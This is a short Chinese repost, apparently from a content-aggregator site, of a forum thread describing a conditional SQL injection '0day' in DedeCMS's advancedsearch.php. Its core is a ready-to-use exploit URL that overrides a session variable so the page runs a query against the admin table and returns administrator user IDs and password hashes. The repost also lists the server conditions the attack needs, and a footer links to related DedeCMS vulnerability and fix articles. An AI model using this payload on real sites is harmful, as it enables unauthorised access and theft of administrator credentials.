dedecms有条件sql注入(x0day)

Posted 2020-08-05 err0">tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了dedecms有条件sql注入(x0day)相关的知识，希望对你有一定的参考价值。

https://www.t00ls.net/thread-35569-1-1.html

 

http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION[123]=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%[email protected]__admin` aaa &sqlhash=123

条件利用：

1.漏洞代码在/plus/advancedsearch.php 文件中
2.是一个sql注入的漏洞
3.php要开启session.auto_start = 1
4.漏洞存在和session有关

以上是关于dedecms有条件sql注入(x0day)的主要内容，如果未能解决你的问题，请参考以下文章

dedecms /member/flink_main.php SQL Injection Vul

dedecms SESSION变量覆盖导致SQL注入漏洞修补方案

DedeCMS另一处全版本通杀SQL注入（无限制）

dedecms cookies泄漏导致SQL漏洞 article_add.php 的解决方法

dedecms漏洞修复大全含任意文件上传漏洞与注入漏洞

dedecms漏洞修复大全含任意文件上传漏洞与注入漏洞